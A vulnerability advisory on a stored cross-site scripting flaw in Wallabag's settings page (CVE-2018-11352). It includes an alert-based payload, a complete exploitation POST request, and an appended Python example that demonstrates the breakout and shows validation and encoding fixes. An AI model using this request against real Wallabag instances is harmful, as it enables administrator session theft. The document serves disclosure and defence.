Wallabag 2.2.3 to 2.3.2 - Stored Cross-Site Scripting


The Wallabag application is affected by one cross-site scripting (XSS) vulnerability that is stored within the configuration page. This vulnerability enables the execution of a JavaScript payload each time an administrator visits the configuration page. The vulnerability can be exploited with authentication and used to target administrators and steal their sessions.

Product Description

Wallabag is an open source RSS reader application, distributed under an MIT license. The project's official website is wallabag.org. The vulnerability described in this document affects version 2.2.3 (released on May 18, 2017) through version 2.3.2 (released on January 22, 2018).

Vulnerabilities List

One vulnerability was identified within the Wallabag web application:

  • One instance of stored cross-site scripting

Affected Version

Version 2.2.3 to 2.3.2

Vulnerability Details

  • CVE ID: CVE-2018-11352
  • Access Vector: Remote
  • Security Risk: Medium
  • Vulnerability: CWE-79
  • CVSS Base Score: 4.9
  • CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

The XSS vulnerability is located on the internal settings configuration page. By injecting a JavaScript payload into this page, an attacker can steal an administrator session. An admin account is required to exploit this instance. The vulnerable parameter is craue_config_modifySettings[settings][23][value]. To trigger the vulnerability, Piwik must be enabled, which is done by setting the parameter craue_config_modifySettings[settings][22][value] to 1. The following payload can be used to demonstrate the attack:

";</script><script>alert(/XSS/)</script>

Figure 1 - XSS Payload

The request below can be used to exploit the vulnerability:

POST /settings HTTP/1.1
Host: HOST
Cookie: PHPSESSID=SESSIONID

craue_config_modifySettings%5Bsettings%5D%5B22%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B23%5D%5Bvalue%5D=v2.wallabag.org%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&craue_config_modifySettings%5Bsettings%5D%5B24%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B0%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B1%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B2%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B3%5D%5Bvalue%5D=http%3A%2F%2Fdiasporapod.com&craue_config_modifySettings%5Bsettings%5D%5B4%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B5%5D%5Bvalue%5D=https%3A%2F%2Funmark.it&craue_config_modifySettings%5Bsettings%5D%5B6%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B7%5D%5Bvalue%5D=http%3A%2F%2Fmyshaarli.com&craue_config_modifySettings%5Bsettings%5D%5B8%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B9%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B19%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B28%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B10%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B11%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B12%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B13%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B14%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B15%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B16%5D%5Bvalue%5D=1&craue_config_modifySettings%5Bsettings%5D%5B17%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B18%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B20%5D%5Bvalue%5D=https%3A%2F%2Fwww.wallabag.org%2Fpages%2Fsupport.html&craue_config_modifySettings%5Bsettings%5D%5B21%5D%5Bvalue%5D=&craue_config_modifySettings%5Bsettings%5D%5B25%5D%5Bvalue%5D=0&craue_config_modifySettings%5Bsettings%5D%5B26%5D%5Bvalue%5D=wallabag&craue_config_modifySettings%5Bsettings%5D%5B27%5D%5Bvalue%5D=0&action=&craue_config_modifySettings%5B_token%5D=CSRFTOKEN

Figure 2 - XSS Exploitation Request
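The root cause is that the stored Piwik host (setting 23) is reflected into an inline script as a raw string literal, so a quote and a `</script>` in the value end the literal and the script element early. The Python below is an added example, not Wallabag's code or the advisory's: it decodes the two relevant parameters from the request in Figure 2, renders them through an assumed stand-in for the vulnerable inline-script pattern, and shows the two defender-side fixes (validate the host as a host, and JSON-encode the value with `</` neutralised when it must be embedded in JavaScript).

```python
import json
import re
from urllib.parse import parse_qs

# Constructed: only the two parameters from the advisory's request that matter.
POSTED_BODY = (
    "craue_config_modifySettings%5Bsettings%5D%5B22%5D%5Bvalue%5D=1&"
    "craue_config_modifySettings%5Bsettings%5D%5B23%5D%5Bvalue%5D="
    "v2.wallabag.org%22%3B%3C%2Fscript%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E"
)
PIWIK_ENABLED = "craue_config_modifySettings[settings][22][value]"
PIWIK_HOST = "craue_config_modifySettings[settings][23][value]"

def piwik_host_from_body(body: str) -> str:
    """Decode the form body and return the Piwik host value ('' if Piwik is off)."""
    params = parse_qs(body, keep_blank_values=True)
    if params.get(PIWIK_ENABLED, ["0"])[0] != "1":
        return ""
    return params[PIWIK_HOST][0]

# Hypothetical stand-in for the vulnerable pattern: the host is dropped into a
# JS string literal inside an inline <script>. Wallabag's real template is not
# shown in the advisory.
def render_unsafe(host: str) -> str:
    return ('<script>var u="//' + host + '/";'
            '_paq.push(["setTrackerUrl",u+"piwik.php"]);</script>')

# Fix 1: a tracker host is a hostname (optionally a port and path), nothing else.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]+(:\d{1,5})?(/[A-Za-z0-9._/-]*)?$")

def is_valid_tracker_host(host: str) -> bool:
    return bool(HOST_RE.match(host))

# Fix 2: when a value must land inside JavaScript, JSON-encode it (escapes
# quotes and backslashes) and turn '</' into '<\/' so the HTML parser can
# never see a closing </script> tag inside the literal.
def js_string_literal(value: str) -> str:
    return json.dumps(value).replace("</", "<\\/")

def render_safe(host: str) -> str:
    return ('<script>var u="//"+' + js_string_literal(host) + '+"/";'
            '_paq.push(["setTrackerUrl",u+"piwik.php"]);</script>')

def script_breakout(html: str) -> bool:
    """True if the inline script is closed more than once, i.e. the value
    escaped the script element (the legitimate close plus an injected one)."""
    return html.lower().count("</script") > 1
```

`render_safe` is the output-encoding half of the fix; in practice `is_valid_tracker_host` should reject the value at save time so the payload is never stored at all.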


About the author, Florian Nivette

Senior Security Consultant

Florian Nivette (CEH, CHFI, CEI, GSNA) is a Bishop Fox Alumnus who was a Senior Security Consultant at Bishop Fox, where he focused on application and network penetration testing and in-depth OS-level security. Florian is an active security researcher focusing on web applications, with a number of published CVEs (CVE-2018-11349, CVE-2018-11350, CVE-2018-11351, CVE-2018-13407, CVE-2018-11408, CVE-2018-13409, CVE-2017-77737, CVE-2017-5870, and CVE-2017-6086). He is one of the chief organizers of Nuit du Hack CTF, the largest and most well-known capture-the-flag competition in France, which draws thousands of security researchers annually.
